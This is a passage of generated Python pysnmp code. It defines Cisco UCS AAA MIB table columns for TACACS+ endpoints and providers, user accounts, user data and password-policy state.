cucsAaaTacacsPlusEpFsmRmtInvRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 10), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtInvRslt.setStatus('current')
cucsAaaTacacsPlusEpFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageDescr.setStatus('current')
cucsAaaTacacsPlusEpFsmStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 12), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStamp.setStatus('current')
cucsAaaTacacsPlusEpFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 13), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStatus.setStatus('current')
cucsAaaTacacsPlusEpFsmTry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 14), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmTry.setStatus('current')
cucsAaaTacacsPlusEpIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpIntId.setStatus('current')
cucsAaaTacacsPlusEpName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpName.setStatus('current')
cucsAaaTacacsPlusEpRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 17), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpRetries.setStatus('current')
cucsAaaTacacsPlusEpTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 18), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpTimeout.setStatus('current')
cucsAaaTacacsPlusEpPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 19), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpPolicyLevel.setStatus('current')
cucsAaaTacacsPlusEpPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 30, 1, 20), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpPolicyOwner.setStatus('current')
cucsAaaTacacsPlusEpFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51), )
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmTable.setStatus('current')
cucsAaaTacacsPlusEpFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaTacacsPlusEpFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmEntry.setStatus('current')
cucsAaaTacacsPlusEpFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmInstanceId.setStatus('current')
cucsAaaTacacsPlusEpFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmDn.setStatus('current')
cucsAaaTacacsPlusEpFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRn.setStatus('current')
cucsAaaTacacsPlusEpFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmCompletionTime.setStatus('current')
cucsAaaTacacsPlusEpFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 5), CucsAaaTacacsPlusEpFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmCurrentFsm.setStatus('current')
cucsAaaTacacsPlusEpFsmDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmDescrData.setStatus('current')
cucsAaaTacacsPlusEpFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmFsmStatus.setStatus('current')
cucsAaaTacacsPlusEpFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmProgress.setStatus('current')
cucsAaaTacacsPlusEpFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtErrCode.setStatus('current')
cucsAaaTacacsPlusEpFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtErrDescr.setStatus('current')
cucsAaaTacacsPlusEpFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 51, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmRmtRslt.setStatus('current')
cucsAaaTacacsPlusEpFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52), )
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageTable.setStatus('current')
cucsAaaTacacsPlusEpFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaTacacsPlusEpFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageEntry.setStatus('current')
cucsAaaTacacsPlusEpFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageInstanceId.setStatus('current')
cucsAaaTacacsPlusEpFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageDn.setStatus('current')
cucsAaaTacacsPlusEpFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageRn.setStatus('current')
cucsAaaTacacsPlusEpFsmStageDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageDescrData.setStatus('current')
cucsAaaTacacsPlusEpFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageLastUpdateTime.setStatus('current')
cucsAaaTacacsPlusEpFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 6), CucsAaaTacacsPlusEpFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageName.setStatus('current')
cucsAaaTacacsPlusEpFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageOrder.setStatus('current')
cucsAaaTacacsPlusEpFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageRetry.setStatus('current')
cucsAaaTacacsPlusEpFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 52, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusEpFsmStageStageStatus.setStatus('current')
cucsAaaTacacsPlusProviderTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31), )
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderTable.setStatus('current')
cucsAaaTacacsPlusProviderEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaTacacsPlusProviderInstanceId"))
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderEntry.setStatus('current')
cucsAaaTacacsPlusProviderInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderInstanceId.setStatus('current')
cucsAaaTacacsPlusProviderDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderDn.setStatus('current')
cucsAaaTacacsPlusProviderRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderRn.setStatus('current')
cucsAaaTacacsPlusProviderDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderDescr.setStatus('current')
cucsAaaTacacsPlusProviderEncKey = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderEncKey.setStatus('current')
cucsAaaTacacsPlusProviderKey = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderKey.setStatus('current')
cucsAaaTacacsPlusProviderKeySet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 8), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderKeySet.setStatus('current')
cucsAaaTacacsPlusProviderName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderName.setStatus('current')
cucsAaaTacacsPlusProviderOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderOrder.setStatus('current')
cucsAaaTacacsPlusProviderPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderPort.setStatus('current')
cucsAaaTacacsPlusProviderRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderRetries.setStatus('current')
cucsAaaTacacsPlusProviderTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 31, 1, 13), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaTacacsPlusProviderTimeout.setStatus('current')
cucsAaaUserTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32), )
if mibBuilder.loadTexts: cucsAaaUserTable.setStatus('current')
cucsAaaUserEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserEntry.setStatus('current')
cucsAaaUserInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserInstanceId.setStatus('current')
cucsAaaUserDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDn.setStatus('current')
cucsAaaUserRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRn.setStatus('current')
cucsAaaUserDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDescr.setStatus('current')
cucsAaaUserEmail = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEmail.setStatus('current')
cucsAaaUserEncPwd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEncPwd.setStatus('current')
cucsAaaUserExpiration = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 7), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserExpiration.setStatus('current')
cucsAaaUserExpires = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 8), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserExpires.setStatus('current')
cucsAaaUserFirstName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserFirstName.setStatus('current')
cucsAaaUserLastName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLastName.setStatus('current')
cucsAaaUserName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserName.setStatus('current')
cucsAaaUserPhone = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 13), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserPhone.setStatus('current')
cucsAaaUserPriv = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 14), CucsAaaAccess()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserPriv.setStatus('current')
cucsAaaUserPwd = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserPwd.setStatus('current')
cucsAaaUserPwdSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserPwdSet.setStatus('current')
cucsAaaUserAccountStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 17), CucsAaaAccountStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserAccountStatus.setStatus('current')
cucsAaaUserClearPwdHistory = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 18), CucsAaaClear()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserClearPwdHistory.setStatus('current')
cucsAaaUserPwdLifeTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 19), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserPwdLifeTime.setStatus('current')
cucsAaaUserConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 20), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserConfigState.setStatus('current')
cucsAaaUserConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 21), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserConfigStatusMessage.setStatus('current')
cucsAaaUserEncPwdSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEncPwdSet.setStatus('current')
cucsAaaUserDataTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40), )
if mibBuilder.loadTexts: cucsAaaUserDataTable.setStatus('current')
cucsAaaUserDataEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserDataInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserDataEntry.setStatus('current')
cucsAaaUserDataInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserDataInstanceId.setStatus('current')
cucsAaaUserDataDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataDn.setStatus('current')
cucsAaaUserDataRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataRn.setStatus('current')
cucsAaaUserDataDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataDescr.setStatus('current')
cucsAaaUserDataIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataIntId.setStatus('current')
cucsAaaUserDataName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataName.setStatus('current')
cucsAaaUserDataPwdChangeCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPwdChangeCount.setStatus('current')
cucsAaaUserDataPwdChangeIntervalBegin = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 8), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPwdChangeIntervalBegin.setStatus('current')
cucsAaaUserDataPwdChangedDate = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 9), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPwdChangedDate.setStatus('current')
cucsAaaUserDataPwdHistory = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPwdHistory.setStatus('current')
cucsAaaUserDataPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPolicyLevel.setStatus('current')
cucsAaaUserDataPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 12), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPolicyOwner.setStatus('current')
cucsAaaUserEpTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33), )
if mibBuilder.loadTexts: cucsAaaUserEpTable.setStatus('current')
cucsAaaUserEpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserEpInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserEpEntry.setStatus('current')
cucsAaaUserEpInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserEpInstanceId.setStatus('current')
cucsAaaUserEpDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpDn.setStatus('current')
cucsAaaUserEpRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpRn.setStatus('current')
cucsAaaUserEpDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpDescr.setStatus('current')
cucsAaaUserEpFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmDescr.setStatus('current')
cucsAaaUserEpFsmPrev = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmPrev.setStatus('current')
cucsAaaUserEpFsmProgr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmProgr.setStatus('current')
cucsAaaUserEpFsmRmtInvErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtInvErrCode.setStatus('current')
cucsAaaUserEpFsmRmtInvErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtInvErrDescr.setStatus('current')
cucsAaaUserEpFsmRmtInvRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 10), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtInvRslt.setStatus('current')
cucsAaaUserEpFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageDescr.setStatus('current')
cucsAaaUserEpFsmStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 12), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStamp.setStatus('current')
cucsAaaUserEpFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 13), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStatus.setStatus('current')
cucsAaaUserEpFsmTry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 14), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTry.setStatus('current')
cucsAaaUserEpIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpIntId.setStatus('current')
cucsAaaUserEpName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpName.setStatus('current')
cucsAaaUserEpPwdStrengthCheck = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpPwdStrengthCheck.setStatus('current')
cucsAaaUserEpPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 19), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpPolicyLevel.setStatus('current')
cucsAaaUserEpPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 20), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpPolicyOwner.setStatus('current')
cucsAaaUserEpFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53), )
if mibBuilder.loadTexts: cucsAaaUserEpFsmTable.setStatus('current')
cucsAaaUserEpFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserEpFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserEpFsmEntry.setStatus('current')
cucsAaaUserEpFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserEpFsmInstanceId.setStatus('current')
cucsAaaUserEpFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmDn.setStatus('current')
cucsAaaUserEpFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRn.setStatus('current')
cucsAaaUserEpFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmCompletionTime.setStatus('current')
cucsAaaUserEpFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 5), CucsAaaUserEpFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmCurrentFsm.setStatus('current')
cucsAaaUserEpFsmDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
